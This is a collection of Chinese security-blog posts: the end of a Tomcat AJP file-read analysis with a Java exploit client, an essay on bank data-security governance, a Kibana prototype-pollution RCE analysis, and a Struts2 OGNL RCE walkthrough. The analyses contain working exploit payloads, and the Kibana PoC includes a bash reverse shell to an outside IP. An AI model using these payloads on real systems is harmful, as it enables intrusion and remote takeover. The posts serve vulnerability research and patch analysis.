public class Test {    public static void main(String[] args) throws IOException {        SimpleAjpClient ac = new SimpleAjpClient();        String host = "localhost";        int port = 8009;        String uri = "/aaa.jsp";        String file = "/WEB-INF/web.xml";        ac.connect(host, port);        TesterAjpMessage forwardMessage = ac.createForwardMessage(uri);        forwardMessage.addAttribute(RequestDispatcher.INCLUDE_REQUEST_URI, "1");        forwardMessage.addAttribute(RequestDispatcher.INCLUDE_PATH_INFO, file);        forwardMessage.addAttribute(RequestDispatcher.INCLUDE_SERVLET_PATH, "");        forwardMessage.end();        ac.sendMessage(forwardMessage);        while (true) {            byte[] responseBody = ac.readMessage();            if (responseBody == null || responseBody.length == 0) {                ac.disconnect();            } else {                System.out.print(new String(responseBody));            }        }    }}```

从构造的AJP消息包里可以看到，关于AJPMessage的核心内容有host、port、INCLUDE_REQUEST_URI、INCLUDE_PATH_INFO、INCLUDE_SERVLET_PATH，我们暂且在这里记下来，等我们打上断点的时候再去服务端看一看这些东西都是干什么的。

这个时候该开始思考动态调试的问题了，不同于以往的rce漏洞（统一往ProcessBuilder的start函数上打），关于断点往哪打就成了第一个关键的问题，我这边的处理方式是因为客户端代码里面使用了AjpMessage类，所以我就去看了一下这个类所在的jar包，果然就找到了tomcat的lib里负责处理AJP协议的类，

这些类看名字差不多就能想到去看一看几个Processor，漏洞的触发一定经过其中的一个，按照第一眼的直觉直接去看AjpProcessor，看到AjpProcessor类里面没有找到我们想要的东西，但是它有一个父类很值得注意，然后我去剩下的几个Processor,发现父类都是AbstractAjpProcessor，所以我就去看了一下这个类的代码，最终决定把断点打在了AbstractAjpProcessor类的process方法上，

跑一下客户端，果然处理AJP协议要经过这个方法，

在AbstractAjpProcessor类的process方法中this.prepareRequest()方法是要去关注一下的，这里面对request做了一些处理，

我们去看一下这个方法的代码，首先回顾一下TesterAjpMessage.java代码里的一处细节，method的值，

这prepareRequest种我们就拿到了这个值，并把request的method定义成了GET，

紧接着进入一个swith循环中给request定义了ADDR、PORT、PROTOCOL，之前在客户端设置的INCLUDE_REQUEST_URI、INCLUDE_PATH_INFO、INCLUDE_SERVLET_PATH也放到了request.include中,

j接着就将request和response交给了CoyoteAdapter类来处理，

接下来就是一系列的反射，最终交给了JspServlet来处理这个请求，

在JspServlet的service方法中就看到了我们之前在利用代码里面定义的INCLUDE_REQUEST_URI、INCLUDE_PATH_INFO、INCLUDE_SERVLET_PATH开始被用到了，

接下来的操作便是把jspUri交给了getResource去读取文件内容

在调用StandardRoot的getResource方法的时候会去调用validate方法对path进行检测

其中RequestUtil.normalize用于目录遍历的检测，所以我们是不能构造../模式的path的，

接下来就会造成文件读取了，总体的调用栈如下，

关于当存在任意文件上传的时候可以造成RCE的原理也是很简单的，我们看一下上面的调用栈，可以发现当我们读取了文件之后是交给了jspServlet去处理的，自然我们上传了jsp文件再通过该方法去读取文件内容的同时jspServlet也会去执行这个文件，利用jsp的<%@ include file="demo.txt" %>去做文件包含从而造成RCE。

这里有一个很重要的点要回过来提一下，这里面我为了顺便讲解RCE的原理，所以我在定义Test.java中的uri变量的时候，给他赋值是xxx.jsp的形式，所以最好AJPProcessor最后是把Message交给了JspServlet来处理这个消息，其实这个漏洞还有第二条利用链，将uri定为xxx.xxx的形式，这样我们的AJPMessage是会交给DefaultServlet来处理的，但其实后面的流程是和前面区别不大的，就不再细说，

补充一下走DefaultServlet利用的调用栈，

修复建议

我这个漏洞的分析出的比较晚，相信修复方法大家也都知道了，我就顺便一提：

1、关闭AJP协议。

2、升级tomcat。

扫码关注

阅读原文

跳转微信打开

我眼中的数据安全治理

Mon, 06 Jan 2020 16:57:00 +0800

原创应用安全团队 2020-01-06 16:57

随着大数据时代的到来，带了很多的便利，但是也带来了更多的风险，作为一名安全行业工作者，对于这种变革更是体会深刻，笔者从事的是金融行业的安全工作，在此从数据安全工作落地的角度来聊一聊数据安全治理及具体工作中碰到的问题。

18年5月《银行业金融机构数据治理指引》正式发布，于此同时数据安全治理工作也同步开始，一直持续至今，在进行数据治理工作的同时也参考了很多国内外的标准：

1.GDPR

2.DSMM

3.ISO27701

4.《银行业金融机构数据治理指引》

5.《个人信息安全规范》

DSMM，数据能力成熟度评估模型，以此为方向，围绕数据生命周期，延伸出具体需要管控的点，及落实的工作

依据数据的生命周期，我理了下在数据治理过程中需要注意的点及需要做的工作：

当然不止上面这些，比如终端安全、DLP等都需要进行严格控制，这些都是基于内部的数据安全控制措施，还有对于外部的威胁监控，比如敏感信息泄漏、业务方面的风险情报等也是我们需要关注的重点，不过在此不做详细介绍，仅列出一些在数据治理方面已经落地的点来做一下描述：

0X01 如何做好数据的分类分级标准

●1.敏感等级的划分

●2.字段标准的确定及敏感等级确定

●3.屏蔽展示规则-脱敏要求

首先我们在做敏感等级的划分时一定不要定太多的等级，比如有这样定的S1、S2、S3、S4四级标准，也有这样定的四级标准：绝密、机密、秘密、非保密，当然也有定的绝密、机密、秘密、内部、公开五级标准，也有人提到定了7级的。

具体如何做，这个纯属看自己选择，在此则要提醒一下：不要定太多等级，落地比较困难，会给自己挖坑的，个人建议四级比较合适，比如：绝密、机密、秘密、非保密。

序号	字段名称	敏感等级	屏蔽规则
1	姓名	秘密	平**
2	手机号	机密	133****5678
3	身份证号码	绝密	1234**********6789

其次，我们在制定数据标准的时候一定要考虑准确性和通用性，这两者之间其实是有点矛盾的，笔者在此就碰到过问题，我们有一个比较通用标准（手机号、姓名、性别、身份证号码…...），也有一个很详细的业务标准（个人中文名称、个人手机号、亲属手机号、代理人手机号……），这两套标准在我们数据打标落地的时候自然而然的就出现冲突，不过可以通过合理定位来解决这种冲突，通用字段标准用来做敏感数据打标，也是敏感数据识别的规则编写依据，而业务标准字段名称则作为业务使用是参考的一个数据标准。也可以将通用字段标准作为一个标签打在业务字段标准上，如下：

序号	业务标准字段名称	标签属性（通用字段名称）	敏感等级
1	个人手机号	手机号	机密
2	亲属手机号	手机号	机密
3	代理人手机号	手机号	机密

最后，为了保证敏感信息不被泄漏则需要遵从最小化原则的基础上，对业务所需名字段进行脱敏，数据的使用一类是具体的业务需求确实需要个人的对应字段信息，对于这类需求我们则需要在满足业务必要性的前提下对字段进行屏蔽或者替换。

比如，在应用系统中对敏感字段进行关键部位屏蔽，或者查看敏感信息时进行二次身份认证，这种一般是在数据属主查看自己敏感信息时可以用到，对于企业进行数据分析时用到的大量的客户数据则不能通过这种方法，因为会存在数据聚合场景下的信息泄漏的风险，通过关联性分析可以匹配出对应的客户敏感数据，所以在制定敏感数据屏蔽规则的时候一定要对其应用场景进行分析.

比如应用系统的敏感信息可以通过屏蔽实现，那么数据分析分析时则更好的方式是通过不可逆加密来实现.

比如之前了解到的阿里的一个产品蚂蚁摩斯，通过一个中间平台，双方吧自己的数据各自加密，然后再通过平台二次加密从而匹配出需要的分析结果，这样就避免了.

0X02 敏感数据识别

在我们确定好分级标准及字段标准后我们接下来要做的工作就是敏感数据的识别，对于敏感数据识别，我将其分为两部分：

●1.敏感数据扫描

上面我们已经制定了数据字段标准和敏感数据字段标准，在此基础上我们可以字段名称来制定识别规则，常用的匹配方式就是关键字和正则，关键字用来匹配名称，正则来识别字段的值

●2.敏感数据打标

为了维护好我们们的基础数据标准，还要对我们识别出的敏感数据进行打标，可以将敏感等级标签打在数据库字段上，也可以在元数据管理上给字段打上安全等级标签。

对于敏感数据的识别及打标最好还是有独立的平台来实现，考虑涉及的技术难度不大，建议自建平台，这样的话也可以根据己方实际的业务情况更加合理的编写识别规则，当然也可以采购一些已有的产品来实现，一些产品已经能够通过机器学习来实现智能化的数据打标，这样覆盖的字段也将更加全面，在建设敏感数据识别打标平台的同时也要注意下多元化的信息存储格式，比如关系数据库、面向对象数据库、数据仓库、文本数据源、多媒体数据库、空间数据库、时态数据库、异质数据库等。

在此可以借鉴下美团鹏飞大佬的扫描器设计图，也可以通过此传送门学习下互联网公司的经验，传送门：https://mp.weixin.qq.com/s/DtGLFwcwNMCZseOKOAOC9Q

0X03 隐私保护

围绕数据生命周期的安全过程，我将其分为两部分，数据安全和隐私保护，数据采集有内外之分，对于外部的数据采集需要数据属主的授权，在内部进行的数据采集则需要在不违背数据授权范围下进行，同时还要考虑数据的用途及业务合理性，但是我们再企业内部也经常会需要依托大量的用户数据进行一些分析统计，在此则不可避免的需要使用到用户的数据信息，那么我们又如何能够做到既不违背隐私保护的原则又满足自身的数据分析行为？

对于隐私保护的方法及标准是否适用于我们业务诉求的场景，这个也是我们需要重点关注的点：

数据匿名化的方法主要有去标识化、K-匿名、L-多样性、差分隐私，但是这些方法并不是适用于我们所有的业务交互的场景。

在此我们则需要引入《个人信息安全规范》中的解释，匿名化主要是指个人信息在通过技术处理后，无法被识破或还原；去标识化指在我们应用系统中展示敏感信息的时候我们可能会做一些屏蔽处理，可以通过屏蔽关键位置来进行掩码；双方进行数据匹配碰撞的时候则可以通过对唯一标示性字段进行不可逆的算法处理，比如sha256、sm3这种摘要算法，进行碰撞然后再将结果与自己数据的映射关系进行比对从而获取想要的结果，K-匿名的应用其实也是有很大的限制，多用于统计分析类的场景，因为不需要具体匹配到某个人，只是做一个统计分析的结果。

然而差分隐私则是应用于解决差分攻击的方案，主要适用于统计聚合数据，比如连续的值、离散的数值。当然对于隐私保护也可以参考下GRC方法论，从治理、风险管理、合规三个领域来进行系统化综合评估才更加的严谨。

扫码关注

阅读原文

跳转微信打开

Kibana RCE漏洞详细分析教程

Mon, 04 Nov 2019 20:46:00 +0800

xsser 2019-11-04 20:46

Nodejs的子进程创建如何获取客户端参数的代码写在了proccess.js中，我们关注下客户端参数解析以上

Nodejs的子进程创建

如何获取客户端参数的代码写在了proccess.js中，我们关注下客户端参数解析

以上代码是nodejs的exec方法的核心代码(卧槽，node自举了)。可以看到代码调用了

normalizeExecArgs(command, options, callback);

而其中的options，是我们传入的命令行的参数，这个函数又调用了

function normalizeSpawnArguments，而这个函数又调用了execFile，而execFile调用了spawn，而在spawn 里定义了这样的代码

const env = options.env || process.env; 获取客户端的options

const envPairs = [];

// process.env.NODE_V8_COVERAGE always propagates, making it possible to

// collect coverage for programs that spawn with white-listed environment.

if (process.env.NODE_V8_COVERAGE &&

!ObjectPrototype.hasOwnProperty(options.env || {}, 'NODE_V8_COVERAGE')) {

env.NODE_V8_COVERAGE = process.env.NODE_V8_COVERAGE;

}

// Prototype values are intentionally included.

for (const key in env) {

const value = env[key];

if (value !== undefined) {

envPairs.push(`${key}=${value}`);

}

简单来说，客户端传入了options选项，那么就根据客户端的来处理，否则就去获取系统环境变量。

作者核心点

在这里我得提一下作者的思路

作者在命令行下尝试了

NODE_OPTIONS=’--require /proc/self/environ’ AAA=’cosole.log(123)//’ node

这是在shell里设置了一个NODE_OPTIONS的值和AAA环境变量，其中NODE_OPTIONS是可以这么写的，官方允许传递这样的参数，具体的文档在http://nodejs.cn/api/cli/node_options_options.html

内容是

作者做这个实验的核心目的就是表达，我在shell下传递options可以包含环境变量来执行代码也可以通过污染原型链来设置环境变量，console.log这个地方就是任意的nodejs表达式，包括执行命令的，这个是为了实验。

关于.env和process.env和/proc/self/environ

官方解释：process 对象是一个 global （全局变量），提供有关信息，控制当前 Node.js 进程。该对象表示Node所处的当前进程，允许开发者与该进程互动。打开命令行，输入node，再输入process.env，可以看见process.env是一个对象。这个对象在kibana这里就是有很多属性，我们污染的这个NODE_OPTIONS就是这个env的属性之一，其实还有NODE_ENV之类的属性。还有版本之类的

根据子进程创建的逻辑，我们是否可以构造一个恶意的代码来污染原型链，因为代码里写了如果没定义process.env就去调用系统的环境变量，而根据javascript规则，我们随意设置一个对象的_proto_的env就可以覆盖掉process的env属性了，这样的话我们可以就定义好了，定义并且赋值就不会undefined了。

简单的说就是object.env下的属性就会被写入到/proc/self/environ里。

所以poc的下半句是

.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

根据作者核心思路“在shell下传递options可以包含环境变量来执行代码也可以通过污染原型链来设置环境变量”，我们开始尝试使用代码来设置环境变量而不是shell。

而/proc/self/environ就和php一样的，如果你设置了进程的环境变量，那么在运行的时候通过linux下/proc/self/environ可以读取进程的环境变量

如何在代码里设置环境变量？

答案是通过原型链污染，我们先污染object.env，也就是设置label.__proto__.env.NODE_OPTIONS，这样的话我们去访问process.env.NODE_OPTIONS就是我们设置的值，根据上面nodejs核心代码child_process.js的逻辑，我们传递的options最终会变成spawn的一个参数，作为环境变量执行。

文件包含获得shell

最后我们通过label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ' 的设置了process.env.NODE_OPTIONS的值，被node读取到了，然后根据官方手册里写的，相当于运行了node --require “xxx.xxx” (就和php里的include 一样，node require的不一定非要是js文件，就和php不一定要是php文件一样)

Poc的另外一句话是：

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')

这里的AAA也是会被写入到/proc/self/environ，最后的环境变量应该是

AAA= require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//NODE_OPTIONS=--require /proc/self/environYarn_VERSION=1.17.3HOSTNAME=7da7727ddePWD=balabalabalabala#^&*(*&^%$

因为//是注释，所以后面忽略，然后这个文件被当作require的参数包含起来了，里面的代码自然就执行了。

几个重要的知识：

1.设置了xx.env.aaa的内容会被写入/proc/self/environ里，怎么设置？通过原型链

2.Poc设置了2个环境变量，一个被注释了

3.NODE_OPTIONS自nodeV8.0.0后才开始(如果你没成功，那么可以排查下nodejs的版本)

其他

聪明的你肯定知道还有其他的办法可以RCE！可以利用的地方很多，原型链撕开了一个攻击面，而NODE_OPTIONS只是一个点。

阅读原文

跳转微信打开

Struts2基于OGNL的RCE漏洞全解析

Thu, 24 Oct 2019 10:49:00 +0800

Glassy 2019-10-24 10:49

最近两年ST2-OGNL方面的漏洞已经渐渐淡出大家的视线，但我觉得作为曾经红极一时的经典系列RCE漏洞，对于ST2和OGNL有一个深入的认知对于代码审计和漏洞挖掘者是十分重要的，

**author:Glassy@平安银行应用安全团队**

引言

最近两年ST2-OGNL方面的漏洞已经渐渐淡出大家的视线，但我觉得作为曾经红极一时的经典系列RCE漏洞，对于ST2和OGNL有一个深入的认知对于代码审计和漏洞挖掘者是十分重要的，所以这篇文章对ST2中由于OGNL造成的RCE漏洞的成因、修复方案一一作了分析，希望能让各位看官对ST2和OGNL能够有一个深入的认知。

环境搭建

笔者为了方便调试各个版本的漏洞临时搭建了一个maven的环境，比较拙劣，就不拿出来给各位看官造成困扰，但是在GitHub上我找到了一个[非常棒的ST2各个版本漏洞调试环境](https://github.com/proudwind/struts2_vulns)，在这里推荐给大家。

不过其实为了提升对漏洞的认知，我还是非常建议自己去搭建环境的。

ognl表达式基础

这里直接通过一段实例代码来解释ognl表达式的一些常规使用，

import ognl.Ognl;import ognl.OgnlContext;
import java.util.HashMap;import java.util.Map;
public class User {
    private String name;
    private Integer age;
    public User() {
        super();
    }
    public User(String name, Integer age) {
        super();
        this.name = name;
        this.age = age;
    }
    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    public Integer getAge() {
        return age;
    }
    public void setAge(Integer age) {
        this.age = age;
    }
    public static void main(String[] args) throws Exception {        User rootUser = new User("tom",18);
        Map<String, User> context = new HashMap<String, User>();
        context.put("user1",new User("jack",20));
        context.put("user2",new User("rose",22));
        OgnlContext oc = new OgnlContext();        //ognl由root和context两部分组成        oc.setRoot(rootUser);
        oc.setValues(context);        //get ognl的root的值的时候，直接写希望获取的值的名字就可以了        String name = (String) Ognl.getValue("name",oc,oc.getRoot());
        Integer age = (Integer) Ognl.getValue("age",oc,oc.getRoot());        //get ognl非root的值的时候，需要使用#        User name1 = (User) Ognl.getValue("#context['user1']",oc,oc.getRoot());
        String name2 = (String) Ognl.getValue("#user2.name",oc,oc.getRoot());
        Integer age1 = (Integer) Ognl.getValue("#user1.age",oc,oc.getRoot());
        Integer age2 = (Integer) Ognl.getValue("#user2.age",oc,oc.getRoot());        //ognl的getValue函数可以直接执行java函数        Object obj = Ognl.getValue("'helloworld'.length()",oc.getRoot());        //访问静态属性和方法的时候需要使用@        Object obj2 = Ognl.getValue("@java.lang.Runtime@getRuntime().exec('open /Applications/Calculator.app/')",oc.getRoot());    }}

S2-001

适用版本：2.0.0 - 2.0.8

简易POC

%{@java.lang.Runtime@getRuntime().exec("open /Applications/Calculator.app/")}

只命令执行，无回显。

实用POC

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash", "-c", "whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

通过重写response实现命令回显。

注意1：tomcat在处理post参数的时候遇到 %{*}的形式会报空指针异常，所以post参数传的时候要做url编码。

注意2：为了研究的目的，仅第一版POC给出实用版，剩下的研究仅提供简易版来验证RCE的存在。

漏洞原理

ognl表达式的getValue函数本身具有执行java代码的能力，最基础的形式如下：

 public class Ognltest {public static void main(String[] args) throws OgnlException {
    OgnlContext context = new OgnlContext();
    Object obj = Ognl.getValue("'helloworld'.length()",context);
    System.out.println(obj);
    Object obj1 = Ognl.getValue("@java.lang.String@format('foo %s','bar')",context);
    System.out.println(obj1);
    Object obj2 = Ognl.getValue("@java.lang.Runtime@getRuntime().exec('open /Applications/Calculator.app/')",context);
}

也就是说，当Ognl.getValue的第一个参数可控的时候，就可以造成RCE。

struts2用来处理传入参数以及request中各项参数的值栈OgnlValueStack在进行取值的时候，就会去调用ognl的getValue参数，从而造成命令执行。

看一下调用栈，只跟到Ognl.getValue，因为到这一步已经可以确认RCE了

先说一下为什么触发点是从doEndTag开始：当你在输入框中输入了用户名或密码后，ST2需要将你输入的值保留在jsp页面表单对应的value上，所以就会去调用doEndTag方法。

关键函数在TextParseUtil.translateVariables

 public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, TextParseUtil.ParsedValueEvaluator evaluator) {        Object result = expression;
        while(true) {            int start = expression.indexOf(open + "{");            int length = expression.length();            int x = start + 2;            int count = 1;
            while(start != -1 && x < length && count != 0) {                char c = expression.charAt(x++);                if (c == '{') {                    ++count;                } else if (c == '}') {                    --count;                }            }
            int end = x - 1;            if (start == -1 || end == -1 || count != 0) {                return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);            }
            String var = expression.substring(start + 2, end);            Object o = stack.findValue(var, asType);            ...        } }

translateVariables函数传过来的open参数的值是'%'，在截取var的时候是截取的 open+{ 之后的字符串，并把var传入stack.getValue，这也是我们的poc构造的时候要写成%{*}形式的原因。进入stack.getValue之后就是顺理成章的进入到Ognl.getValue中去了。

关于实用版本的POC，还有有一个值得一提的地方，就是如何让命令进行回显，这里就是通过struts2处理response的com.opensymphony.xwork2.dispatcher.HttpServletResponse类来写入了我们命令执行的回显。不过随着struts版本的升级，处理response的类会改变，因此写入回显的类也会发生变化。

修复

去看一下S2-001的修复代码，修复放也在了TextParseUtil.translateVariables函数中，

  public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, TextParseUtil.ParsedValueEvaluator evaluator, int maxLoopCount) {        Object result = expression;        int loopCount = 1;        int pos = 0;
        while(true) {            int start = expression.indexOf(open + "{", pos);            if (start == -1) {                int pos = false;                ++loopCount;                start = expression.indexOf(open + "{");            }
            if (loopCount > maxLoopCount) {                break;            }
            int length = expression.length();            int x = start + 2;            int count = 1;
            while(start != -1 && x < length && count != 0) {                char c = expression.charAt(x++);                if (c == '{') {                    ++count;                } else if (c == '}') {                    --count;                }            }
            int end = x - 1;            if (start == -1 || end == -1 || count != 0) {                break;            }
            String var = expression.substring(start + 2, end);            Object o = stack.findValue(var, asType);            ...            ...             int length2 = (left == null || left.length() <= 0) ? 0 : left.length() - 1;             int length3 = (middle == null || middle.length() <= 0) ? 0 : middle.length() - 1;             pos = Math.max((length3 + length2) + MAX_RECURSION, MAX_RECURSION);             ...        }  }

ST2在修复漏洞的时候，不像一般的框架通过抛异常的方式，所以分析修复还需要把两个版本的jar包做一下比对，而且修复点还是放在了xwork的jar里面，这点需要留意。

因为ST2在处理stack值栈的时候，是根据传入的expression是否是%{*}的形式来判断这个参数是否需要传给Ognl.getValue的，POC也正是利用了这一点，把形如 %{*}的特殊参数值传了进去。这次修复的时候，在判断expression是否形如%{*}的时候加入了一个起始位置判断参数pos（而不是所有的值都是从起始位开始计算），这样的话是防止了构造特殊参数值的问题。但与此同时，我们也能看出ST2因为自身需要，无法对%{*}这种写法进行禁用，这次的特殊值是从post的参数值传过来的，下一次也可能从很多其他地方传过来，毕竟不论是header还是post的参数名等很多从request传过来的值都是需要放在OgnlValueStack中的，所以，以此为基点，也开始拉开了ST2不断被发掘RCE的起点。

S2-003

适用版本：2.0.0 - 2.1.8.1

tomcat版本要求：6.0

因为高版本的tomcat遇到了S2-003的POC中的特殊字符会报错，所以这个漏洞的复现只能在Tomcat的6.0及以前版本复现。

同Ognl.getValue，Ognl.setValue同意具有执行java代码的能力，写法如下，

 OgnlContext context = new OgnlContext();  Ognl.setValue("(\"@java.lang.Runtime@getRuntime().exec(\'open  /Applications/Calculator.app/\')\")(glassy)(amadeus)",context,"");

看一下这个ognl的表达式，表面上去看上去是有点诡异的，在我们上面的getValue的exp后面多了个(glassy)(amadeus)，关于ognl对上面这串表达式的执行流程是，ognl首先对(\"@java.lang.Runtime@getRuntime().exec(\'open /Applications/Calculator.app/\')\")(glassy)当做表达式进行计算，这个表达式返回了带有payload的ASTEval树，然后以amadeus为root再对这个AST树进行计算，从而造成了RCE.

如果觉得笔者说的不够详细还可以直接去看一下[官方的原文解释](http://commons.apache.org/proper/commons-ognl/language-guide.html)。

S2-003就是利用了Ognl.setValue的执行java代码的能力造成的RCE。

简易POC

http://www.glassy.com/test.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(a)(b)&('\u0040java.lang.Runtime@getRuntime().exec(\'open\u0020/Applications/Notes.app/\')')(a)(b)

POC和Ognl表达式区别不大，只有两点需要留意：

1. 多了一个将xwork.MethodAccessor.denyMethodExecution的值设为false的操作。

2. 一些敏感字符（@、\=、#）被写成了\u00??的形式。

具体原因在原理中给出。

原理

poc要分两部分分析，第一部分('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(a)(b)

先url变成未编码的样式去看 ('#context[\'xwork.MethodAccessor.denyMethodExecution\']=false')(a)(b)

看变量名都能明白是什么意思denyMethodExecution，将禁止方法执行设置为了flase，也就是允许方法执行。

第二部分 ('\u0040java.lang.Runtime@getRuntime().exec(\'open%\u0020/Applications/Notes.app/\')')(a)(b) 就是我们希望传给Ognl.setValue的值 ('@java.lang.Runtime@getRuntime().exec(\'open /Applications/Notes.app/\')')(a)(b)

看一下调用栈，

其中在ParametersInterceptor的doIntercept方法中，可以看到把denyMethodExecution设置为了true，这也是我们poc第一部分要把值修改一下的原因，

否则的话，在调用getRuntime方法的时候，会报错，具体判断代码在XWorkMethodAccessor的callStaticMethod方法中。

    public Object callStaticMethod(Map context, Class aClass, String string, Object[] objects) throws MethodFailedException {        Boolean exec = (Boolean)context.get("xwork.MethodAccessor.denyMethodExecution");        boolean e = exec == null ? false : exec;        return !e ? super.callStaticMethod(context, aClass, string, objects) : null;    }

然后我们再来看一下两部分POC的字符都写成\u00??的样式的原因，第一点，我们先理解一下为什么写成这种形式，代码能识别，

看一下OgnlUtil类的setValue函数，可以看到它在调用Ognl.setValue的时候，会先把传过来的name放到compile函数中做一下处理，也正是这个处理将\u00??转化成了其url解码后对应的字符。

    public static void setValue(String name, Map context, Object root, Object value) throws OgnlException {        Ognl.setValue(compile(name), context, root, value);    }

上面解释了编码后字符能够被识别的原因，现在我们来看一下为什么要编码，在参数进入到ParametersInterceptor的setParameters函数的时候，要把参数放到acceptableName函数中做一下判断，如果不满足判断，就不会对后续参数进行处理，看一下这个函数，

 protected boolean acceptableName(String name) {        return name.indexOf(61) == -1 && name.indexOf(44) == -1 && name.indexOf(35)         == -1 && name.indexOf(58) == -1 && !this.isExcluded(name);    }

可以看到是有一个黑名单的，也可以发现'#'对应的ascii 35是在这个黑名单里面的，所以我们才需要进行编码。

但是从黑名单里面可以看到，‘@’对应的ascii 64并不在黑名单之中，那为什么它也要进行编码呢，我们去比对一下@编码和不编码的时候的params值的区别，因为params值在后续是会轮流放进Ognl.setValue方法中的，

其中有一处看上去不起眼的区别就是，poc的两部分的顺序发生了变化，而因为后面的Ognl.setValue的调用是按照params的顺序进行的，一旦造成RCE的poc部分在设置denyMethodExecution的poc部分之前执行了，就会抛出异常了，这就是‘@’字符不在黑名单中也要做一个编码的原因。

不过这个poc只适用到2.0.11到2.0.11.1和2.0.11.1不再使用indexOf来做黑名单匹配，而改使用了[\p{Graph}&&[^,#:=]]*这个正则去做匹配，效果一样。

后续的操作就是Ognl.setValue造成RCE的部分，就不再分析了。

修复

这次漏洞修复的补丁比较复杂一点，先对修复前后两个版本的xwork的jar包做一个比对，可以看到关键的修复部分在ParametersInterceptor的setParameters处

还有OgnlValueStack中新增了一个allowStaticMethodAccess成员变量和SecurityMemberAccess成员对象，

动态调试一下，就可以发现在stack中多了一个securityMemberAccess变量，其中关键的成员变量allowStaticMethodAccess和excludeProperties为后续能否调用函数做了一下判断。具体的判断位置分别在SecurityMemberAccess的isAccessible函数和isExcluded函数中。

S2-005

适用版本：2.0.0 - 2.1.8.1

tomcat版本要求：6.0

S2-005就是对于S2-003的绕过，从上面的修复可以看到，补丁的关键部分在于通过对securityMemberAccess的两个成员变量allowStaticMethodAccess和excludeProperties对OGNL表达式能否加载函数，然而通过OGNL表达式，我们可以改写这两个变量的值（和denyMethodExecution是一个套路），来实现补丁的绕过。我们需要做的事情就是保证allowStaticMethodAccess的值为真，excludeProperties的值为空。

简易POC

http://www.glassy.com/test.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(a)(b)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(a)(b)&('\u0023_memberAccess.allowStaticMethodAccess\u003dfalse')(a)(b)&('\u0040java.lang.Runtime@getRuntime().exec(\'open\u0020/Applications/Notes.app/\')')(a)(b

原理

关于绕过思路，没有什么好说的了，我们在这里就讨论一下怎么去构造这个payload，也就是#memberAccess.allowStaticMethodAccess=false这个#memberAccess是怎么来的。

其实struts2的SecurityMemberAccess类是ognl中DefaultMemberAccess类的一个子类，在使用Ognl进行getValue的时候，会把这个SecurityMemberAccess传递给ognl，使用我们只需要去看看ognl怎么设置MemberAccess的值就OK了。去看一下Ognl类的setMemberAccess函数，

public static void setMemberAccess(Map context, MemberAccess memberAccess) {        context.put(OgnlContext.MEMBER_ACCESS_CONTEXT_KEY, memberAccess);}

再去看一下OgnlContext.MEMBERACCESSCONTEXTKEY的值，就找到了memberAccess，

public static final String MEMBER_ACCESS_CONTEXT_KEY = "_memberAccess";

关于_memberAccess.excludeProperties的空值怎么构造，只需要把程序断点打到excludeProperties赋值前，就可以看到空值是什么样子的了，

修复

S2-005的补丁就是加强了ParametersInterceptor.acceptableName函数的正则，把正则换成了更精准额匹配：[a-zA-Z0-9.][()_'\s]+

S2-007

适用版本：2.0.0 - 2.2.3

S2-007的利用场景比较苛刻，要求对提交的参数配置了验证规则并对提交的参数进行类型转换的时候会造成OGNL表达式的执行。

简易POC

假设user.birthDay做了类型转换。

user.name=glassy&user.age=12&user.birthDay=%27%2b(%23_memberAccess.allowStaticMethodAccess%3dtrue%2c%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%40java.lang.Runtime%40getRuntime().exec(%27%2fApplications%2fNotes.app%2fContents%2fMacOS%2fNotes%27))%2b%27&user.email=31312%40qq.com

原理

在这里先介绍一下ST2如何处理各种数据（客户端穿来的param，生成的日志等），所有的数据优先都会先去找到DefaultActionInvocation类，再由DefaultActionInvocation交给对于的Interceptor处理，总共有16个Interceptor，都可以在xwork-default.xml中看到，

                         class="com.opensymphony.xwork2.interceptor.ScopedModelDrivenInterceptor"/>

关于S2-007漏洞的触发是和类型转换报错有关的，我们很容易就找到了ConversionErrorInterceptor，看名字就知道类型转换报错是交给这个类处理的，

跟进ConversionErrorInterceptor的intercept函数，可以看到我们构造的payload被取出后，进到了getOverrideExpr函数

看一下getOverrideExpr函数，其实就是把我们的payload用单引号阔起来了，这也就解释了为什么我们的payload是形如 ' + (*) + '的形式，就是为了逃逸这个单引号，

然后我们以kay-value的形式将param-payload存入名为fakie的变量中，继续往下，看到最后fakie被放到了setExprOverrides函数中，

根据setExprOverrides函数，就是讲param-payload的这个变量放到了stack的overrides中了，

接下来我们就去跟进一下造成RCE的调用栈，只跟进到ognl.getValue()剩下的都是前文的内容了，

其实总体上的调用栈和001非常相似，唯一我们需要留意的就是payload是从哪里获取的，看一下OgnlValueStack的tryFindValue，看到进入getvalue的expr的值是从lookupForOverrides中获取的，

跟进lookupForOverrides函数，就可以看到我们把ConversionErrorInterceptor在处理payloay的时候放进overrides的值给拿出来了，接下来就是顺理成章的交给ognl.getValue()造成rce。

修复

看一下007的修复，在ConversionErrorInterceptor的getOverrideExpr中对value的值做了一下escape，防止再从引号里面逃逸出来。

S2-009

适用版本：2.0.0 - 2.3.1.1

tomcat版本要求：6.0

S2-009其实就是对003和005的绕过，通过上面的修复分析，我们可以看到对于参数名的正则限制，已经可以保证在参数名方面寻找绕过方式是很困难的了，于是009把绕过的重点放到了参数值上，

首先去看一个ognl.setValue造成rce的一种新的写法，

